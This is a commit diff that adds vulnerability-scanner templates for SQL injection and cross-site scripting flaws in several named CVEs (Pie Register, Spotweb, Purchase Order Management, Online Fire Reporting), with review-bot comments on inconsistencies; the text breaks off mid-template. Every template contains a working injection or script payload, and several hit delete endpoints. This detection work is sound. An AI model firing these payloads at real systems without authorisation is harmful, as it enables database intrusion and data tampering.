templates added
parent
bb76430753
commit
ffc66c4bd8
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2021-24731
|
||||
|
||||
info:
|
||||
name: Pie Register < 3.7.1.6 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.
|
||||
remediation: Fixed in version 3.7.1.6
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a
|
||||
- https://wordpress.org/plugins/pie-register/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24731
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24731
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-json/pie/v1/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "User credentials are invalid.")'
|
||||
condition: and
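Review bot: The raw request asks for `SLEEP(3)` but the first DSL condition is `duration>=6`, and nothing in the template explains why the threshold is twice the requested delay. If the injected expression is evaluated twice by the plugin's login query, that should be stated; if it is not, the check will miss vulnerable hosts that answer after about three seconds. I would add a comment above the matcher such as `# SLEEP(3) is expected to fire twice on a vulnerable host, hence 6s (confirm)`. A single timing sample is also sensitive to slow backends, so a hit from this template should be confirmed manually before it is reported as critical.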
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-27124
|
||||
|
||||
info:
|
||||
name: Doctor Appointment System 1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.
|
||||
reference:
|
||||
- https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
|
||||
- https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27124
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 6.5
|
||||
cve-id: CVE-2021-27124
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,doctor-appointment-system,unauthenticated
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /patient/search_result.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "c8c605999f3d8352d7bb792cf3fdb25b"
|
||||
- "Doctor Appoinment System"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
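Review bot: The tag list ends in `unauthenticated`, but the classification gives `PR:L` and the request targets `/patient/search_result.php` without any login step, so the two fields disagree about whether a session is needed. Whichever is correct for this application should be reflected in both places; other templates in this commit also spell the tag `unauth`, so tag filters will not catch this one. The hash in the body matcher is hard-coded, while the Online Fire Reporting templates declare `num: '999999999'` and match on `{{md5(num)}}`; using the same form here keeps the payload and the expected value tied together. The `metadata` block has no `max-request` entry.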
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2021-40908
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.
|
||||
reference:
|
||||
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40908
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-40908
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,purchase-order,poms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "status\":\"incorrect\"")'
|
||||
condition: and
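Review bot: The metadata key is written `max-req: 1` here, while other templates in this commit use `max-request: 1`; anything that reads the request count by key name will presumably not see the misspelled one. Change the line to `max-request: 1`. The same spelling appears in the sections for CVE-2022-28023, CVE-2022-31975, CVE-2022-31976, CVE-2022-31977, CVE-2022-31980, CVE-2022-31982, CVE-2022-31983 and CVE-2022-31984. The key is missing altogether in CVE-2021-27124, CVE-2021-43725 and CVE-2022-28022.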
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40968
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40968
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40968
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[newpassword2]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40969
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40969
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40969
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[firstname]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40970
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40970
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40970
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb,unauthenticated
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[username]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
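Review bot: The request goes to `/install.php?page=1`, but the description attributes the flaw to templates/installer/step-004.inc.php and the sibling installer templates in this commit (CVE-2021-40968, -40969, -40971, -40972, -40973) all post to `page=4`. If page 1 is intentional for the username field, the description should name the file that actually renders it; if it is a slip, the request line should read `POST /install.php?page=4 HTTP/1.1`. The tag list also uses `unauthenticated` where CVE-2021-43725 uses `unauth`, so one spelling should be chosen. All six installer checks only fire while install.php is still reachable, which is worth one sentence in the description so that a finding also prompts removal of the installer.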
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40971
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40971
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40971
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[newpassword1]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40972
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40972
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40972
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[mail]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2021-40973
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/711
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40973
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-40973
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /install.php?page=4 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
settingsform[lastname]=pdteam'+onclick='alert(document.domain)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "onclick='alert(document.domain)"
|
||||
- "Spotweb"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-43725
|
||||
|
||||
info:
|
||||
name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter.
|
||||
remediation: Fixed in version 1.5.2
|
||||
reference:
|
||||
- https://github.com/spotweb/spotweb/
|
||||
- https://github.com/spotweb/spotweb/issues/718
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43725
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-43725
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: title:"SpotWeb - overview"
|
||||
tags: cve,cve2021,xss,spotweb,unauth
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'name="data[performredirect]" value=""><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2022-28022
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-28022
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-28022
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,purchase-order-management-system,unauth
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Master.php?f=delete_item HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "success")'
|
||||
condition: and
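Review bot: The last DSL condition, `contains(body, "success")`, matches any response that happens to contain that word, whereas the sibling template for CVE-2022-28023 pins the JSON fragment; use `'contains(body, "status\":\"success")'` here as well. The raw request also lacks the `@timeout: 10s` annotation that other time-based templates in this commit carry, so whether a six-second response is ever observed depends on the runner's default timeout. The same gap exists in CVE-2021-40908 and CVE-2022-28023. The `metadata` block has no `max-request` entry.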
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-28023
|
||||
|
||||
info:
|
||||
name: Purchase Order Management v1.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md
|
||||
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-28023
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-28023
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,purchase-order,poms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Master.php?f=delete_supplier HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "status\":\"success")'
|
||||
condition: and
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2022-31879
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.
|
||||
reference:
|
||||
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31879
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-31879
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Dashboard")'
|
||||
condition: and
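Review bot: This template and the one for CVE-2022-31974 probe the same `page=reports&date=` parameter, so a vulnerable host is reported twice with different severities (8.8 here, 7.2 there). The UNION-based check in CVE-2022-31974 is deterministic, while this one relies on a single timing sample plus the generic word `Dashboard`. I would state the overlap in the description so triage can deduplicate the two findings. The cvss-metrics say `PR:L` but the request carries no session; a comment should explain this (presumably the admin page renders without login, which needs confirming).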
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-31974
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-1.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31974
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31974
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
variables:
|
||||
num: '999999999'
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{{md5(num)}}"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31975
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-2.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31975
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31975
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
variables:
|
||||
num: '999999999'
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{{md5(num)}}"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31976
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-4.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31976
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-31976
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
max-req: 1
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,online-fire-reporting
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /classes/Master.php?f=delete_request HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "status\":\"success\"}")'
|
||||
condition: and
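Review bot: The probe calls a delete action (`f=delete_request`) and the matcher requires the `success` status, so the application's delete statement does run on the scanned host. The empty `id` presumably means no row matches, but that is not stated anywhere. Add a comment above the raw request such as `# id is left empty so the delete matches no row (confirm against the application)`. The same concern applies to delete_team (CVE-2022-31977), delete_inquiry (CVE-2022-31978) and the two Purchase Order Management templates that call delete_item and delete_supplier with a non-numeric id. Operators scanning production systems need this stated to judge whether the check is safe to run.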
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2022-31977
|
||||
|
||||
info:
|
||||
name: Online Fire Reporting System v1.0 - SQL injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team.
|
||||
reference:
|
||||
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-3.md
|
||||
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31977
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-31977
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
